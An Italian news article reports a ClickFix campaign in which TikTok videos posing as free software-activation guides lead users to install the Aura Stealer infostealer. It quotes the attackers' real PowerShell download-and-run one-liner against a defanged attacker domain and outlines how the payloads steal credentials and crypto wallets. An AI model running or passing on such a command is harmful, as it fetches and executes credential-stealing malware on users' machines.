Attacchi ClickFix su TikTok: falsi tutorial attivano malware

Una nuova campagna di attacchi ClickFix sta sfruttando video pubblicati su TikTok per distribuire malware in grado di rubare informazioni sensibili dagli account degli utenti. I video si presentano come guide gratuite per attivare software popolari come Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro. Si tratta quindi di una vera e propria campagna di phishing.

Come funziona l’attacco su TikTok

Le clip condivise nascondono un attacco di social engineering mirato a spingere le vittime ad eseguire comandi PowerShell malevoli. L’istruzione tipica mostrata nei video รจ:

Pubblicitร 
iex (irm slmgr[.]win/photoshop

A seconda del software imitato, il nome all’interno dellโ€™URL varia (ad esempio windows o spotify). L’esecuzione del comando collega il sistema ad un dominio controllato dagli attaccanti (slmgr[.]win) che scarica script PowerShell aggiuntivi e due eseguibili dannosi.

Il primo file, updater.exe, รจ una variante del malware Aura Stealer, specializzato nel furto di credenziali salvate nei browser, cookie di autenticazione, chiavi di wallet di criptovalute e dati di accesso ad applicazioni desktop. Una volta eseguito, il malware invia queste informazioni ai server dei cybercriminali e permette l’accesso remoto agli account compromessi.

Un secondo componente, source.exe, viene poi scaricato e compilato localmente tramite il compilatore .NET (csc.exe) per l’iniezione e l’esecuzione di codice malevolo direttamente in memoria. La funzione esatta di questo payload non รจ stata perรฒ ancora chiarita.

Come difendersi dagli attacchi ClickFix

Gli esperti raccomandano a chiunque abbia assistito all’esecuzione di istruzioni simili di cambiare immediatamente tutte le password. Gli attacchi ClickFix sono sempre piรน diffusi e utilizzati per distribuire ransomware e malware mirati al furto di criptovalute.

Come regola generale, gli utenti dovrebbero evitare di copiare comandi da fonti non verificate ed eseguirli su PowerShell, Terminale o Prompt dei comandi, anche quando provengono da piattaforme apparentemente affidabili come TikTok.

Iscriviti a Google News Per restare sempre aggiornato seguici su Google News! Seguici
Pubblicitร 
Claudio Garau
Claudio Garau
Web developer, programmatore, Database Administrator, Linux Admin, docente e copywriter specializzato in contenuti sulle tecnologie orientate a Web, mobile, Cybersecurity e Digital Marketing per sviluppatori, PA e imprese.

Leggi anche...

GopherWhisper: il nuovo gruppo di hacker che sfrutta Outlook, Discord e Slack per attacchi malware

Un nuovo gruppo di cybercriminali, noto come GopherWhisper, รจ...

Social media e minori: il divieto australiano รจ inefficace

Un recente report ha evidenziato come il divieto di...

Deepfake in crescita: USA in cima e X il social network predominante

Negli ultimi anni, l'evoluzione dell'intelligenza artificiale ha portato a...

Avviso di consegna pacco: il pericolo del malware nascosto negli allegati

Recentemente, gli esperti di cybersecurity hanno messo in guardia...

Ivory: il nuovo social network italiano per contenuti di qualitร 

Nasce in Italia un nuovo social network, Ivory, concepito...

Hacker attaccano il sistema anti-inondazione di Piazza San Marco a Venezia

Negli ultimi giorni, la cittร  di Venezia ha visto...
Pubblicitร